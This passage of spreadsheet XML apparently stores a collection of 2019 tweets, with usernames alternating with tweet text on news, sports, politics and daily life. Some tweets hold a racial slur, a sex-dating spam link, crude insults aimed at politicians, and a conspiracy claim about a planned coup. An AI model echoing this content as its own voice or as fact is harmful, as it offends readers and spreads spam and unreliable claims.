    <t>Some of y’all don’t know how to be real Christians and it shows .. Why can’t you give probs to somebody truly forgiven someone. Like lord just cause y’all can’t don’t mean someone else can’t Jesus Christ 🥴</t>
  </si>
  <si>
    <t>spiralarchetect</t>
  </si>
  <si>
    <t>@CNN Secret words untrustworthy people - cnn is shit for promoting this. There will be life beyond trump. Don’t get blind to liberty</t>
  </si>
  <si>
    <t>AhmedAquil</t>
  </si>
  <si>
    <t>@CynthiaDRitchie Welldone Cynthia! I said it before &amp; will again. Govt of 🇵🇰@PTIOfficialISB should honour you with Pakistani citizenship. @Gulalai_Ismail Pls learn to criticise constructively not generally. If you have negative feelings about your motherland then seek asylum somewhere else.</t>
  </si>
  <si>
    <t>AndreTrades</t>
  </si>
  <si>
    <t>@realDonaldTrump WHY DO YOU ENJOY GETTING ON YOUR KNEES FOR PUTIN SO OFTEN WITH A GIANT SMILE ON YOUR FACE ESPECIALLY WHEN HE FINISHES???</t>
  </si>
  <si>
    <t>JordanTylerXXX</t>
  </si>
  <si>
    <t>@RealVickyVixxx Of course I'm available for paid shoots too....</t>
  </si>
  <si>
    <t>MarkIKendrick</t>
  </si>
  <si>
    <t>@nononon07210124 @glennbeck The phrase 'fear of god' has always been directed toward the delusional donor base. The 'brass' knows there is no god.</t>
  </si>
  <si>
    <t>Jo_Earlsfield</t>
  </si>
  <si>
    <t>@HelenSimpson4 @cjpeilow Thanks Helen. I was back on the saddle today, and collected loads of signatures to try to make Garratt Lane a 20 mph. Lots of support from residents on Earlsfield Road, who also want the same. We can make these roads safer for people using all forms of getting around!</t>
  </si>
  <si>
    <t>Laura1375</t>
  </si>
  <si>
    <t>@sugarbunn10 #HappinessWithUs with this video. What is it about the color orange that guess everyone and their grandmother 👵 gets so excited about. I wonder why? 😏 #JonasBrothers #TheGroup #PCAs 🔄 Retweet this tweet 🐦</t>
  </si>
  <si>
    <t>lovesexzx</t>
  </si>
  <si>
    <t>♀️ Best Sex Dating Site ♀️ If you want to find your Sex Partner, ♀️ You can register for free by verifying your e-mail. CLICK 👉🔗 https://t.co/4o13XPnbqh CLICK 👉🔗 https://t.co/4o13XPnbqh CLICK 👉🔗 https://t.co/4o13XPnbqh https://t.co/Ob6fKzJC2k</t>
  </si>
  <si>
    <t>VancouverSun</t>
  </si>
  <si>
    <t>'The Triumph of Injustice': U.S. billionaires paid lower tax rate than working class last year, researchers say https://t.co/uEh9JRdHhM https://t.co/7yFvirhNu4</t>
  </si>
  <si>
    <t>edric___g</t>
  </si>
  <si>
    <t>@sorrowedsea That would be amazing, to be honest.</t>
  </si>
  <si>
    <t>rikognition</t>
  </si>
  <si>
    <t>@E_Diep @AndrewYang @richbrian What the</t>
  </si>
  <si>
    <t>MAGA4Patriots</t>
  </si>
  <si>
    <t>@CWGoldenWings @timbrow72976624 Thank you so much I have been disabled for almost 10 years it is so horrible what Americans go through because of these ILLEGALS I appreciate your prayers God Bless You🙏</t>
  </si>
  <si>
    <t>spider_ultimate</t>
  </si>
  <si>
    <t>9 people followed me and 4 people unfollowed me // automatically checked by https://t.co/ismVoIrfLz</t>
  </si>
  <si>
    <t>hothotcocoa05</t>
  </si>
  <si>
    <t>@charlamanesbane That's part of the "BernieBro" myth. Ignore it.</t>
  </si>
  <si>
    <t>mimiondaweeknd</t>
  </si>
  <si>
    <t>It’s scary out here tryn take ppl serious lol y’all stay up lol</t>
  </si>
  <si>
    <t>MysteriousRyan</t>
  </si>
  <si>
    <t>@ThatOneGameBoy &lt;15 FPS @ 144p might want to get a new PC :^) https://t.co/9wIS7RjdTq</t>
  </si>
  <si>
    <t>sammich840</t>
  </si>
  <si>
    <t>You are virtually unstoppable when you are working with awaren... More for Aries https://t.co/arKaOmqZNe</t>
  </si>
  <si>
    <t>SHEEZUS5</t>
  </si>
  <si>
    <t>I just want a nice house in the hills with a pool and a nice view overlooking my city 🙏🏾</t>
  </si>
  <si>
    <t>donnaduckqq</t>
  </si>
  <si>
    <t>Pursue what sets your heart on fire 🔥🔥🔥🔥 Go for it, seek your passions and chase them, noone will do it for you 💜 #daretobedazzled💎 #younique #ylife #dreams #passions #goals #mindset #positiveactions… https://t.co/rvs6XEcqux</t>
  </si>
  <si>
    <t>DSMWcom</t>
  </si>
  <si>
    <t>Trump Makes Few Promises to U.K. Over Diplomat’s Wife Who Fled Crash https://t.co/HphdT6NLna</t>
  </si>
  <si>
    <t>BMSWorldMission</t>
  </si>
  <si>
    <t>#Pray for BMS workers Mat Gregory and Annie and Dan Dupree. Pray that they will continue to show God’s love to marginalised people groups in Albania through the ministry of BMS partner Tek Ura.</t>
  </si>
  <si>
    <t>melodra_ama</t>
  </si>
  <si>
    <t>@leopardgeckk I NEARLY FELL OFF MY CHAIR EVEN THOUGH I WAS FULLY AWARE OF THE THEORIES AND HOW MUCH SENSE THEY MADE</t>
  </si>
  <si>
    <t>MusicFactsFun</t>
  </si>
  <si>
    <t>From A Window by Billy J. Kramer With The Dakotas peaked at No.23 on October 3,1964 spending 10 weeks on Billboard magazine's #Hot100 Singles Chart: https://t.co/xm2BV3yZ9k</t>
  </si>
  <si>
    <t>mrshannyroo</t>
  </si>
  <si>
    <t>@JasiahYoung_ @SammiHaneySassy you are so talented and so brave to show the world this gift of confidence and skill of acting that you both have. I wish I'd been as brave when I was younger. Your characters are so believable too. #amimakingthisweird? Thank you!</t>
  </si>
  <si>
    <t>BennettStaff1</t>
  </si>
  <si>
    <t>#WednesdayWisdomGaps in your employment and not sure where to start! Here are a few tips on filling in the gaps..... Unemployment can be a scary obstacle but it doesn’t need to be. https://t.co/pokzkaCQYz</t>
  </si>
  <si>
    <t>ShabVintique</t>
  </si>
  <si>
    <t>Malibu blue and purple flower petals , Turquoise flower petals, ocean blue rose petals, table decor, flower girl petals, alternative wedding https://t.co/xyCQQZSW5Y #weddingdecor #fallwedding https://t.co/HRZhRLEOP1</t>
  </si>
  <si>
    <t>PapaZaia</t>
  </si>
  <si>
    <t>@RudyGiuliani From Trump down, there is NO legitimacy Rudy. That includes you. Do you not think that the majority of US citizens don’t see this and you won’t answer for your treason?</t>
  </si>
  <si>
    <t>WriteThingsPr25</t>
  </si>
  <si>
    <t>@aaron_equus21 Pretty much everything I write has gay leads with a few exceptions, it's honestly easier for me to write to be honest.</t>
  </si>
  <si>
    <t>TrueSouthernGA</t>
  </si>
  <si>
    <t>@KingDrue17 @jppeak Before unfollowing someone, please check their following number. Tw’er keeps making them show as ZERO &amp; it looks like they unfollowed you, but they didn’t!! It happened to me yesterday &amp; I lost hundreds of followers! Within 30 mins, all followed “mysteriously” showed back up! https://t.co/JNK1spGzkg</t>
  </si>
  <si>
    <t>JohnV8r</t>
  </si>
  <si>
    <t>@MichaelJLev @FS1 Anytime Rod Gilmore isn’t announcing, it’s a good day! Capt Obvious makes me want to jam a pen in my neck...and on really bad days he makes me wish I was hanging out with ASU fans.</t>
  </si>
  <si>
    <t>BankBrasi</t>
  </si>
  <si>
    <t>I #Crashed on Purpose to show u Who u Fuckin Wit Gates</t>
  </si>
  <si>
    <t>The_Alfie_Inc</t>
  </si>
  <si>
    <t>@KabScorner perfect balance of Punk and Cute</t>
  </si>
  <si>
    <t>minakimes</t>
  </si>
  <si>
    <t>@MatthewBerryTMR if Field and Jacob from Twilight had a baby https://t.co/Qo2A0kerhp</t>
  </si>
  <si>
    <t>_NYREEISM</t>
  </si>
  <si>
    <t>Dude imagine having your best friend steal your identity after you lose your memory to get close to your dad &amp; instead of being pissed y’all still treat her like family after you find out https://t.co/GbZcOqOeCb</t>
  </si>
  <si>
    <t>KWMadhead85</t>
  </si>
  <si>
    <t>11 days till i see the cousin @KWMadhead94 again https://t.co/FZqBedL6Hx</t>
  </si>
  <si>
    <t>MassTweetz</t>
  </si>
  <si>
    <t>Those at the top of the mountain didn't fall there.</t>
  </si>
  <si>
    <t>ThinixUSA</t>
  </si>
  <si>
    <t>Roxa Hospitality CEO talks sustainability and branding https://t.co/U2VMIdBqMw</t>
  </si>
  <si>
    <t>GrumpyIndy</t>
  </si>
  <si>
    <t>@ThePlumLineGS @realDonaldTrump So, Trump's stupid green light is backfiring big-time, including with all the Republicans and his other enablers, so he's pretending he didn't give the green light and is now reinventing history in a sorry attempt to save the day. This is Trumpistan. #WorstPresidentEver</t>
  </si>
  <si>
    <t>samgran18</t>
  </si>
  <si>
    <t>You know what’s crazy? Not knowing what the hell you want in life. Like I know what I want career wise but I don’t know about everything else.</t>
  </si>
  <si>
    <t>larketian</t>
  </si>
  <si>
    <t>@TheRock Hey man you got people out here on FB using your name an image to try to scam people, just a heads up. https://t.co/woaONZvKSC</t>
  </si>
  <si>
    <t>blazeymc91</t>
  </si>
  <si>
    <t>@nevillehurst2 It is about oil profits and it really doesn't matter how many maniacs they create that will attack nightclubs, bars, churches &amp; synagogues nor who else they create who may attack innocent people at mosques, because all that matters to them is PROFIT as the cost of human life.</t>
  </si>
  <si>
    <t>BestBuyBusiness</t>
  </si>
  <si>
    <t>Is there evidence that the recent China trade war may affect digital signage? #digitalsignage #tariffs https://t.co/7Y18c2b1tJ</t>
  </si>
  <si>
    <t>10ToesOfFury</t>
  </si>
  <si>
    <t>Let's be a married couple for Halloween. @HungJerseyGal</t>
  </si>
  <si>
    <t>Rich_Graff</t>
  </si>
  <si>
    <t>Dear #yankees Gary Sanchez sucks! He hasn’t been hitting since June, he allows simple pitches to get by him behind the plate, and he’s terrible at calling a game. Please put in Austin Romine.</t>
  </si>
  <si>
    <t>Renee_Giarrusso</t>
  </si>
  <si>
    <t>I am once again \excited to have had my article included in the @thriveglbl community! You can read more here: https://t.co/eSgnt7No7j</t>
  </si>
  <si>
    <t>WhiteboiBeats</t>
  </si>
  <si>
    <t>@f3nhr Hit me up at https://t.co/Ufm0f3Uzm3</t>
  </si>
  <si>
    <t>Juniper700</t>
  </si>
  <si>
    <t>Great day off think I it's going to p**s it down all day!! Only one thing for it on days like this #retailtherapy and #coffee and #cake #lookingonthebrightside</t>
  </si>
  <si>
    <t>grannygethealth</t>
  </si>
  <si>
    <t>Steve Bannon Warns "Old Battle Horse" HIllary Clinton is Likely to Jump into the DNC Race (VIDEO) https://t.co/xFmvNZRqhx via @gatewaypundit</t>
  </si>
  <si>
    <t>mbta_mood</t>
  </si>
  <si>
    <t>😖: The overall mood of riders worsened in the last hour. Analyzed 58 tweets, with 55.12% feeling Hopeless. #Boston #MBTA #MBTAMOOD https://t.co/WOndP8tlF6</t>
  </si>
  <si>
    <t>DeePeeArts</t>
  </si>
  <si>
    <t>@TurtleofPotato Basically whoever retweets your one art post here will post the link to their one art post for you to do the same :)</t>
  </si>
  <si>
    <t>Morgan_bigboobs</t>
  </si>
  <si>
    <t>I am wealthy, I am a wealthy, I attract wealth to me from all directions</t>
  </si>
  <si>
    <t>VehiclePlates</t>
  </si>
  <si>
    <t>@globalnews You completely suck, Global. The fact that you use Liberal Party of Canada buzzwords is proof of your bias. It's "illegal".</t>
  </si>
  <si>
    <t>Heisenbergul</t>
  </si>
  <si>
    <t>@CNN Now starts a litany of fake ppl decrying the loss.</t>
  </si>
  <si>
    <t>newercolossus</t>
  </si>
  <si>
    <t>@thorsson_john @Amy_Siskind The point is completely lost on you which is too bad, I really am pulling for white men to be more conscious of these things. Maybe you should watch the exchange again. The issue isn't whether Joe got votes. Or vote for Biden in the primary, whatever</t>
  </si>
  <si>
    <t>larssolarsen</t>
  </si>
  <si>
    <t>@MollyJongFast Pay per view. For the defense fund.</t>
  </si>
  <si>
    <t>Kahooterz</t>
  </si>
  <si>
    <t>@FrostBros_ @buttergolem_uhc I'm a packers fan and I was screaming at the refs on these calls</t>
  </si>
  <si>
    <t>RealRightLeaf</t>
  </si>
  <si>
    <t>@tyIerzilla F for your twitter account</t>
  </si>
  <si>
    <t>WHSHappenings</t>
  </si>
  <si>
    <t>Happy Homecoming from Valeria and Dalila! @wakefieldchief @SGAWakefield @WakeAthletics #APSisAwesome 💚🙂☀️ https://t.co/Fuw6tTKC5O</t>
  </si>
  <si>
    <t>PatriotNews</t>
  </si>
  <si>
    <t>Obituaries in The Patriot-News, Oct. 8, 2019 https://t.co/6SQPPwdWSK</t>
  </si>
  <si>
    <t>DocLanceP</t>
  </si>
  <si>
    <t>@BeyZeybelAbidin @ianbremmer Still, Tiffany &amp; Co was an odd choice to say the least.</t>
  </si>
  <si>
    <t>SaxMike71</t>
  </si>
  <si>
    <t>I, IN MY UNSURPASSED BRILLIANCE, DECIDED TO WALK RATHER THAN DRIVE OVER TO THE OTHER BUILDING IN A DRIVING RAINSTORM.</t>
  </si>
  <si>
    <t>ttajonetstokes</t>
  </si>
  <si>
    <t>people on the tl complaining that it’s 90 degrees in october but don’t believe climate change is a real thing... whew the lack of brain cells i tell you.</t>
  </si>
  <si>
    <t>VincentWright</t>
  </si>
  <si>
    <t>@KiKiPosting Owl to Kimberly: "Strange"??? It ain't strange to us, Kimberly!" 🦉🙃🦉</t>
  </si>
  <si>
    <t>elliewilkinsxn</t>
  </si>
  <si>
    <t>I actually look like such a fucking tramp for work ALL the time LOL</t>
  </si>
  <si>
    <t>vSanjo</t>
  </si>
  <si>
    <t>@Silverestx Windia, I don’t remember the leader honestly! Fairly sure it was a Hero (at that time)..</t>
  </si>
  <si>
    <t>Allykat_SC</t>
  </si>
  <si>
    <t>@WillBedingfield @realDonaldTrump #WeVapeWeVote #ivapeivote #20millionstrong And yes I am real person and vaping DID save my life!! https://t.co/mNYus55odc</t>
  </si>
  <si>
    <t>Grizzly_Stevens</t>
  </si>
  <si>
    <t>@DavidClassyBear @dumbsideup @CynChamplin I like this!! I'm stealing it too... just to be up front about it, I will give you credit for the first few times I use it, but after that it'll be "Like I always say"...LOL!</t>
  </si>
  <si>
    <t>sierrachha</t>
  </si>
  <si>
    <t>Just found out I get 3 attempts on my online midterm and 2 1/2 hours each attempt 😂 I love college</t>
  </si>
  <si>
    <t>ramaleybot</t>
  </si>
  <si>
    <t>Belzebub? He word Brotherend turne Boy the King? Speake you schoole with the Souldiers, it none, now vnto a good abour?</t>
  </si>
  <si>
    <t>jimmycopenhaver</t>
  </si>
  <si>
    <t>"If you begin to look at churches, church members, preachers, and church leaders, you will find yourself ready to give up and quit. But if you will turn your eyes upon Jesus and look full in His wonderful face, all... https://t.co/5Piq7V634V</t>
  </si>
  <si>
    <t>_BossyAF_</t>
  </si>
  <si>
    <t>Didn’t ask for your advice but ok</t>
  </si>
  <si>
    <t>terriebraun</t>
  </si>
  <si>
    <t>@mickitiki @peace4all333 Still watch some shows. Juan ruined the five... Martha MacCallum went to the dark side. Sean,Tucker, Judge Jeanine and Gutfeld are still good.</t>
  </si>
  <si>
    <t>markwarne</t>
  </si>
  <si>
    <t>Very frustrating that having updated to #ios13.3 @Apple still haven’t sorted out the playlist artwork issue that so many people are complaining about. Please get it sorted in the next update.</t>
  </si>
  <si>
    <t>smileyerakatt</t>
  </si>
  <si>
    <t>yo can joaquin phoenix slide his diet plan to lose weight for the role of the joker.... i need it</t>
  </si>
  <si>
    <t>amydeemo</t>
  </si>
  <si>
    <t>@DebraKi53686485 I know!!! I can sell the petrol lawnmower &amp; the strimmer!! 😊</t>
  </si>
  <si>
    <t>burial_grid</t>
  </si>
  <si>
    <t>Clive Barker: the LGBTQ Lovecraft without all the racism</t>
  </si>
  <si>
    <t>shroomicus</t>
  </si>
  <si>
    <t>@r00tsh4w @StopBabyCutting Penile Cancer is caused by HPV (which we have a vaccine for) and is predomintly observed in geriatrics. So it is of no concern for children, only adults, by which time they are capable of weighing the risks for themselves.</t>
  </si>
  <si>
    <t>Allstar1890</t>
  </si>
  <si>
    <t>@natashamartintv I'm just about to leave work. Will you wait about an hour?</t>
  </si>
  <si>
    <t>JSR_LeeCampbell</t>
  </si>
  <si>
    <t>@O2 want at least £20 a month more, with a longer contract, less data allowance and an upfront cost for the iPhone 11 Pro for UPGRADING with them. I could join a new provider and get a much better deal. What’s the point in staying exactly?</t>
  </si>
  <si>
    <t>don_digiovanni</t>
  </si>
  <si>
    <t>@TuckerCarlson David Tafuri looks like Jimmy Fallon. Are you sure you are interviewing the right person?</t>
  </si>
  <si>
    <t>AzNWontonz</t>
  </si>
  <si>
    <t>@dazeyos Thanks for the advice!</t>
  </si>
  <si>
    <t>mrs_steel_</t>
  </si>
  <si>
    <t>Didn't expect to find flowers in my baby leaf salad @LidlGB 🌼 https://t.co/fievFfz80b</t>
  </si>
  <si>
    <t>NowPlaying Satellite - The Hooters https://t.co/kxGEZPwF68 11:56</t>
  </si>
  <si>
    <t>sharinyles</t>
  </si>
  <si>
    <t>@PugloverDeb @TheDemocrats Very encouraging data Debbie🤞🏼Collective PTSD means we take nothing for granted.</t>
  </si>
  <si>
    <t>MarvinFriday</t>
  </si>
  <si>
    <t>@thestevenwoods @BenHigginsSD Sums up the Padres second half of the season.</t>
  </si>
  <si>
    <t>thagreatcarlos</t>
  </si>
  <si>
    <t>@AdamSchefter That’s been a sorry for like 2 years.</t>
  </si>
  <si>
    <t>bbfranklin4</t>
  </si>
  <si>
    <t>@MaddMike41 Michael Scott told us this when Sabre gave him the metal bottles. Really hits you in the fillings.</t>
  </si>
  <si>
    <t>Nufkin</t>
  </si>
  <si>
    <t>I think I have figured out why this season of Bake Off isn’t hitting home with me. The bakers all seem annoyed or stressed all time. None of them look like they are having fun. It’s like the show has sucked the passion from them.</t>
  </si>
  <si>
    <t>garethimurphy</t>
  </si>
  <si>
    <t>@carolecadwalla Wow! The most important graph and tweet of Brexit so far...</t>
  </si>
  <si>
    <t>CleveFoundation</t>
  </si>
  <si>
    <t>Can’t wait to read their words and hear their voices. Happy to support this at @FreshWaterCLE Four aspiring Fairfax writers prepare to take on Cleveland with their stories https://t.co/9VxnY5QVRm</t>
  </si>
  <si>
    <t>cgate61</t>
  </si>
  <si>
    <t>@ZekeJMiller So? You call yourself a news reporter? You have to reach that far to try to make something up? Isn’t there enough real news?</t>
  </si>
  <si>
    <t>crazygemz85</t>
  </si>
  <si>
    <t>Instinctively offering assistance to an overwhelmed friend or ... More for Taurus https://t.co/WrlLij1RFr</t>
  </si>
  <si>
    <t>ThomasLassi</t>
  </si>
  <si>
    <t>@EricaLeigh13 @tysen_olson @GrillBoyCecil @BetterUBet @SFlipp @TtoEtoC @SvenTystnad @AnikVJoshi @Kil_l_audio @C_nrad @_jatkinson @BlackGuelph @jedimama @TimeoutWithTL @favourite_uncle @c_haberman @yourbuddyspooky @ofIngleside @minglu778 @Ryan_Kinney11 @JasonCooper22 @1967mustangman @waffleblessings @shannon_last @yellojkt @j1ri_ @rtlicari @homanclature @kenhesser @HaikuJonah @ADLouisUSA @Subbeaconfan @rachelbulman @goshy_joshy @FlaggTaylor4 @SSEUPodcast @KevinDrives @AdamMDG @MegathreadMilk @EvelynFMcHale @tomabella @SonnyBunch @csp372 @laceltris @megsg19 @carmella_nicole @woodbridge36 @ConFilmBuff @MichaelRWarren @ztrobbins If you're not listening to the Subbeacon, you might as well go find the nearest street trafficked by buses and have a lie down in it</t>
  </si>
  <si>
    <t>SamuelBStein</t>
  </si>
  <si>
    <t>@TheEugeniaKim Free and open to the public -- just drop by.</t>
  </si>
  <si>
    <t>Brotherj55</t>
  </si>
  <si>
    <t>@SteveKerr took time to retweet about dicks sporting goods but still hasn’t studied up on the China issue. Absolute coward and fraud! And to steal from scent of a woman. Greg popovich fuck you to!</t>
  </si>
  <si>
    <t>AaliyahChanelx</t>
  </si>
  <si>
    <t>When the fuck you start putting a time limit on exams</t>
  </si>
  <si>
    <t>TheDebtAdvisor</t>
  </si>
  <si>
    <t>"Millennial? This is why you’re broke. A middle-class life is unaffordable" Here’s the proof: https://t.co/YGTUvl515Q</t>
  </si>
  <si>
    <t>gordovegan</t>
  </si>
  <si>
    <t>@tyjishwaa At my local Ralph’s. But it’s similar to Kroger’s from what I heard ☺️</t>
  </si>
  <si>
    <t>ksstradio1230</t>
  </si>
  <si>
    <t>Saltillo Lions Win Cross Country Meet in Mount Pleasant Saturday and Lady Lions are Third https://t.co/hg3jPLRGFh https://t.co/sEVL4705Il</t>
  </si>
  <si>
    <t>SuperGamer61499</t>
  </si>
  <si>
    <t>@KjoDevilHunterS Definitely for sure.</t>
  </si>
  <si>
    <t>JulianHWright</t>
  </si>
  <si>
    <t>@Pablo__durr Yayayayay congrats! Per chance in the city or Northbridge?? (So you can buy me a celebratory bevvy, obvi 😜)</t>
  </si>
  <si>
    <t>CantGOPanymore</t>
  </si>
  <si>
    <t>@LandorMelanie @HeathMayo @ChrissieKeffler This isn't a court, you aren't a lawyer and no one owes you proof or even an explanation. But just for the hell of it: Abuse of Power, Obstruction of Justice and Receipt (and probably Solicitation) of Corrupt Emoluments. Open and shut.</t>
  </si>
  <si>
    <t>mcfaddenmurphy9</t>
  </si>
  <si>
    <t>@RabbiJill @danpfeiffer I cannot sit here and listen to his ridiculous accusations against @AdamSchiff who is doing a GREAT job at getting to the truth. Something 45 knows nothing about. U unfortunately when backed in to a corner , liars usually keep lying. #TheTruthIsInevitable</t>
  </si>
  <si>
    <t>monaalmutlaq82</t>
  </si>
  <si>
    <t>@CLTtoastmasters @hamdahalghamdi @CLTtoastmasters Many Thanks to our speaker today Dr Hamdah Alghamdi for brightening our day with her inspiring speech✨🙏🏼💖</t>
  </si>
  <si>
    <t>ClaudiaRueckert</t>
  </si>
  <si>
    <t>@ArbovirusAlba yet your student(s) did ... and enjoyed it immensely 😆</t>
  </si>
  <si>
    <t>MaPoStormborn</t>
  </si>
  <si>
    <t>@ShamrockGen I met my great grandma and grandpa Strand. They both lived into their 90's. Unfortunately we lived half a country apart so I only got to meet them a couple of times.</t>
  </si>
  <si>
    <t>chefesco</t>
  </si>
  <si>
    <t>@coachWhoa @SYRmotsag 1,300 through 6 games is a damn shame for a former 5star lol</t>
  </si>
  <si>
    <t>CaliWiersma</t>
  </si>
  <si>
    <t>Perfect Chaos. Yup. That pretty much sums up my life...and I love it. https://t.co/ZlpBKZa5z7</t>
  </si>
  <si>
    <t>Danoman71</t>
  </si>
  <si>
    <t>Great 60 minute game boys, best of the season so far 😊 Drouin is a new man, leading the offence like a stud 😎</t>
  </si>
  <si>
    <t>wenderella60</t>
  </si>
  <si>
    <t>Thread by @almostjingo: "1. A story that once seemed insane but now seems absolutely plausible: how @AdamSchiff @CIA @FBI used Moby and a druan/hacker in the planned coup against @POTUS. 2/17 Moby said (among other things) foreign intel […]" #FullOfSchiff https://t.co/YlTk5xtUEJ</t>
  </si>
  <si>
    <t>royfptrsn</t>
  </si>
  <si>
    <t>@justgodsword Eternal, has nothing to do with time. Time only affects physical matter.</t>
  </si>
  <si>
    <t>noircyclopedia</t>
  </si>
  <si>
    <t>Alan Dershowitz and the wheel of pain https://t.co/rxGFKK5W55 via @cjr</t>
  </si>
  <si>
    <t>JoesGonnaTweetU</t>
  </si>
  <si>
    <t>Lmao they beat Kofi for the belt in 9 seconds? Man I’m glad I didn’t watch that...#SmackDown</t>
  </si>
  <si>
    <t>AffinityDJ</t>
  </si>
  <si>
    <t>#nowplaying Electric Light Orchestra - Getting To The Point on https://t.co/ZQahWKUwhx</t>
  </si>
  <si>
    <t>DailyGamerNick</t>
  </si>
  <si>
    <t>@ThePrestigeYT Please send me some info! I would love to be a part of this!</t>
  </si>
  <si>
    <t>SpyViolette</t>
  </si>
  <si>
    <t>@TheRustyQuill That's worrying but I do appreciate the extra sleep.</t>
  </si>
  <si>
    <t>OliverGavin4</t>
  </si>
  <si>
    <t>Chicago | Chicago Police Board expected to rule tonight on whether Officer Robert Rialmo should be fired https://t.co/FQuACNF4RN</t>
  </si>
  <si>
    <t>Lizzie_PUNC19</t>
  </si>
  <si>
    <t>@PUNC19_VCliff that's for sure 😆</t>
  </si>
  <si>
    <t>TyMarshall_MEN</t>
  </si>
  <si>
    <t>Arrived at the Den Haag Stadium. Tidy little stadium. AZ Alkmaar training at the moment. We’ll be hearing from Ole Gunnar Solskjaer and Juan Mata in around 15 minutes #mufc https://t.co/qx2XbEbUTN</t>
  </si>
  <si>
    <t>2tweetaboutit</t>
  </si>
  <si>
    <t>Boris Johnson warns Brussels that Britain cannot be 'held against its will' as Ireland mounts all-out bid to kill off his fledgling Brexit blueprint before it has even been formally tabled... https://t.co/zBqkYhnuw9 via @MailOnline</t>
  </si>
  <si>
    <t>DaleAllenBerg</t>
  </si>
  <si>
    <t>Seeing as I have to listen to kids YouTube music 24/7/365 I just have to say: @DaveAndAva is where it’s at for musicality. They have the best riffs and progressions of any kids music band. And now it’s time to take my antidepressant. #StayAtHomeDad #SpecialNeeds #Rett</t>
  </si>
  <si>
    <t>NWPB</t>
  </si>
  <si>
    <t>The Labour Market Insight survey ends in November. If you haven't had the chance yet, read our latest press release for more info, then follow the link in the article to take the survey. It only takes 7mins &amp; can help shape the future of work in Niagara. https://t.co/pJOTAWERkA</t>
  </si>
  <si>
    <t>fuzzheavy</t>
  </si>
  <si>
    <t>Just favorited "The Doomed &amp; Stoned Show - Chicago Doomed &amp; Stoned..." by @DoomedandStoned on Mixcloud https://t.co/RGYkbiiWVw</t>
  </si>
  <si>
    <t>OHBlucci</t>
  </si>
  <si>
    <t>The thing about vacation. Everyone else works.. ME: 🤷🏾‍♂️</t>
  </si>
  <si>
    <t>JahTme_</t>
  </si>
  <si>
    <t>Ruffles start @ 1 and I’m trying not 2 fall asleep Rec anyone??</t>
  </si>
  <si>
    <t>KingKey025</t>
  </si>
  <si>
    <t>I talk to raya n keyvonna everyday</t>
  </si>
  <si>
    <t>niblexis</t>
  </si>
  <si>
    <t>I've put up WorldAnvil page for Crowns in case you guys are interested! I'll be putting lore stuff up on here before I put it in books on the server. https://t.co/MY5auDJIkS</t>
  </si>
  <si>
    <t>RIPkaijew</t>
  </si>
  <si>
    <t>the clip from lrt is so embedded into my brain because @PyronoidD would reference it SO fucking much in like 2011/2012</t>
  </si>
  <si>
    <t>annamlewis</t>
  </si>
  <si>
    <t>Happy Inktober! Loved playing and creating fun drawings last year, so I had to do it again. I’m hoping to create something each day that relates to one of my current projects, using @mrjakeparker prompts. 📞🖋🖊#Inktober2019 #Inktober #inktoberday1 #artsnackschallenge https://t.co/saoRuYDtQH</t>
  </si>
  <si>
    <t>rachelhappyface</t>
  </si>
  <si>
    <t>@helenraw @eliistender10 Haha waft? How long are you leaving the end? 😂</t>
  </si>
  <si>
    <t>Jrcox04</t>
  </si>
  <si>
    <t>@MrNukemCocaine @realDonaldTrump It is/was, however, the talking point of dear leader and many of his cronies.</t>
  </si>
  <si>
    <t>FukTheRightWing</t>
  </si>
  <si>
    <t>@Karen22912 @kk_in_AB @CindylouAB @JustinTrudeau Thoughts and prayers! #ChooseForward 🙂🇨🇦🎉</t>
  </si>
  <si>
    <t>tommygun264</t>
  </si>
  <si>
    <t>@BeingHelpish @MysterySolvent I think it’s her arm hanging down with the upper dark portion being in the shadow cast by #NastyNaziLauraIngraham’s upper body, the light source being a stage light above and to our right. The stage lights are angled to illuminate ppl sitting on set a few feet behind the bigots.</t>
  </si>
  <si>
    <t>WendyESlater</t>
  </si>
  <si>
    <t>"If your sweetness Touched my lips In an absolute Moment, The vulnerability Would reveal To be licked By the taste of all Always." An excerpt from THE OCHER OF ABUNDANCE ☄ https://t.co/AZmT1B9tHG Spiritual #Poems Sacered #poetry https://t.co/UWJ6wv0v0m https://t.co/8QbVnGeZuk</t>
  </si>
  <si>
    <t>HenryCorp</t>
  </si>
  <si>
    <t>The latest The Save-the-American-Dream Daily! https://t.co/tf4Op9CWUi Thanks to @drewmagary @ggreeneva @rjeskow #mapoli #fightfor15</t>
  </si>
  <si>
    <t>quoth_the_rave</t>
  </si>
  <si>
    <t>Picked up a little something for my mini at the airport today. #NotoriousRBG https://t.co/gWSWLO9ngT</t>
  </si>
  <si>
    <t>SomiiBae</t>
  </si>
  <si>
    <t>You have the power to control the intensity of a clash of styl... More for Scorpio https://t.co/ljluvwq4at</t>
  </si>
  <si>
    <t>DorindaMedley</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: Elle Sasson Nelly Tie-Strap Crop Top. https://t.co/2Ozkra3TTv via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>kcroyal_</t>
  </si>
  <si>
    <t>Are you the new Sammy Sosa? New skin.</t>
  </si>
  <si>
    <t>BillyJBryant</t>
  </si>
  <si>
    <t>When you need to solder but left your station at home... A bowl with a damp paper towel works great to clean your iron tip! #makerslife #solderingtips https://t.co/L9p7p01Ltq https://t.co/OUBiwXPeXZ</t>
  </si>
  <si>
    <t>toomuchFinesse</t>
  </si>
  <si>
    <t>I’d jump on Meg and scream “GIVE THE NIGGA BACK TO THE STREETS AYE! ASK YOUR MAN NOT ME AYE!”</t>
  </si>
  <si>
    <t>violaleanne226</t>
  </si>
  <si>
    <t>@wordmixrr @ktzhaoauthor @RosieeThor @RosariaMunda Breaking my book diet for two of these!</t>
  </si>
  <si>
    <t>mtnManCrypto</t>
  </si>
  <si>
    <t>@TheCryptoLark LINK is leading the next bull run for Alts</t>
  </si>
  <si>
    <t>Eve_Sc0t1sh</t>
  </si>
  <si>
    <t>@simon12265 @ThePCCLondon @DarkTempleFilms Those are some mighty footsteps to follow, i'll be keeping an eye out for you from now on. Good Luck!</t>
  </si>
  <si>
    <t>lipiroy</t>
  </si>
  <si>
    <t>@sira_ulo_ko Thsnk you for your support, my friend. Hope you're doing well 😄</t>
  </si>
  <si>
    <t>pyratecanegrl</t>
  </si>
  <si>
    <t>@ShotCaller305 @AhmmonR2 Ahmmon you need to come and take a shot with me!!!!! Come see me in East 4!!!</t>
  </si>
  <si>
    <t>GaryBasnett</t>
  </si>
  <si>
    <t>@PrivateLombatv Thanks for the follow! I followed you back!</t>
  </si>
  <si>
    <t>AngryCDNMom</t>
  </si>
  <si>
